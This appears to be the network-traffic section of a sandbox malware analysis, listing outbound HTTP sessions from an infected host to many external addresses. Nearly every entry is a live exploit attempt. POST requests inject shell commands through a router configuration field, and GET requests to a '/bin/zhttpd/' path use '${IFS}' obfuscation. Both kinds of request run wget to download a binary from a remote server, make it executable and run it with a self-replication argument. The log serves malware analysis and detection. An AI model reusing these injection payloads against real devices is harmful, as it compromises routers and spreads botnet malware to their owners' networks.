                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:52.963989019 CET509INHTTP/1.1 400 Bad Request
                                                  Server: thttpd/2.19-MX Sep 9 2013
                                                  Content-type: text/html
                                                  Date: Fri, 19 Jan 2024 17:23:52 GMT
                                                  Last-modified: Fri, 19 Jan 2024 17:23:52 GMT
                                                  Accept-Ranges: bytes
                                                  Connection: close
                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 31 39 2d 4d 58 20 53 65 70 20 20 39 20 32 30 31 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                  Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.19-MX Sep 9 2013</A></ADDRESS></BODY></HTML>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3652192.168.2.1335788177.53.136.1748080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.720314980 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:52.988558054 CET39INHTTP/1.1 200 Data follows


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3653192.168.2.1348120183.113.93.478080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.737111092 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:53.021275997 CET103INHTTP/1.1 404 Not Found
                                                  Content-Type: text/plain
                                                  Content-Length: 30
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3654192.168.2.1344344194.65.14.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.985583067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3655192.168.2.1360764117.141.105.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.985718012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3656192.168.2.1342986203.235.219.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.985759974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3657192.168.2.135138414.161.188.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.985836983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3658192.168.2.1348066200.219.122.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.985893965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3659192.168.2.1333078221.197.243.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.985946894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3660192.168.2.135014645.198.198.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.985985041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3661192.168.2.134535813.111.85.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986068010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3662192.168.2.1343084223.120.13.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986128092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3663192.168.2.133992259.204.114.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986187935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3664192.168.2.134982683.211.252.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986258030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3665192.168.2.134218289.182.89.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986320019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3666192.168.2.135023287.186.85.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986377001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3667192.168.2.134610290.176.124.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986450911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3668192.168.2.1347824107.241.117.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986502886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3669192.168.2.1354042194.200.88.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986568928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3670192.168.2.1345010122.154.196.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986639023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3671192.168.2.1350132141.116.144.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986701965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3672192.168.2.1360282148.199.17.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986762047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3673192.168.2.1339492170.52.10.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986830950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3674192.168.2.136038219.112.222.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986866951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3675192.168.2.1334596132.164.245.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986907959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3676192.168.2.133499236.18.119.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986960888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3677192.168.2.1348668221.18.72.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.986988068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3678192.168.2.1339262137.129.19.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987071037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3679192.168.2.1334426160.201.114.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987135887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3680192.168.2.1335072200.236.211.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987195015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3681192.168.2.1335176140.49.79.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987234116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3682192.168.2.135160638.118.174.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987310886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3683192.168.2.135441495.178.156.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987353086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3684192.168.2.1342426143.54.131.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987422943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3685192.168.2.134632424.206.50.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987473965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3686192.168.2.1352278125.69.102.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987528086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3687192.168.2.1333908137.58.111.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987587929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3688192.168.2.133798244.249.137.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987647057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3689192.168.2.1341338200.243.44.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987710953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3690192.168.2.1352970221.183.151.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987754107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3691192.168.2.1334546124.88.200.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987796068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3692192.168.2.135674225.3.67.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987828970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3693192.168.2.1343968147.160.179.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987873077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3694192.168.2.1344786163.61.185.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987947941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3695192.168.2.1333406187.84.150.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.987977982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3696192.168.2.1343026206.7.42.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988044024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3697192.168.2.1342314194.7.250.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988111019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3698192.168.2.134337820.116.165.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988162994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3699192.168.2.1351940160.146.204.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988226891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3700192.168.2.134307447.190.188.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988286972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3701192.168.2.1336430160.168.199.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988337040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3702192.168.2.1334996155.122.214.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988399029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3703192.168.2.133290641.78.249.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988460064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3704192.168.2.1336020221.248.23.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988500118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3705192.168.2.1336480142.124.104.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988558054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3706192.168.2.13567745.124.180.73443
                                                  TimestampBytes transferredDirectionData
